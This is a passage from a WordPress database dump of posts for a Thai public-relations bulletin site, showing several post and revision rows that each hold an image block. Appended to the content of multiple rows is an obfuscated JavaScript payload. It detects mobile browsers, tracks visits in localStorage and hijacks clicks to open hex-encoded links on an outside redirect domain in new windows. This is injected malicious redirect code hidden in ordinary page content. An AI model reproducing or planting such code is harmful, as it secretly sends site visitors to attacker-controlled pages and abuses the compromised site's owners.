_0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','234-revision-v1','','','2024-07-27 22:48:13','2024-07-27 15:48:13','',234,'http://pakhaeng.ssk.in.th/?p=236',0,'revision','',0),
(237,1,'2024-07-27 22:48:44','2024-07-27 15:48:44','<!-- wp:image {\"id\":238,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/16-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-238\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-17','','','2024-07-27 22:48:46','2024-07-27 15:48:46','',0,'http://pakhaeng.ssk.in.th/?p=237',0,'post','',0),
(238,1,'2024-07-27 22:48:35','2024-07-27 15:48:35','','16-2566','','inherit','','closed','','16-2566-2','','','2024-07-27 22:48:35','2024-07-27 15:48:35','',237,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/16-2566-1.png',0,'attachment','image/png',0),
(239,1,'2024-07-27 22:48:44','2024-07-27 15:48:44','<!-- wp:image {\"id\":238,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/16-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-238\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const 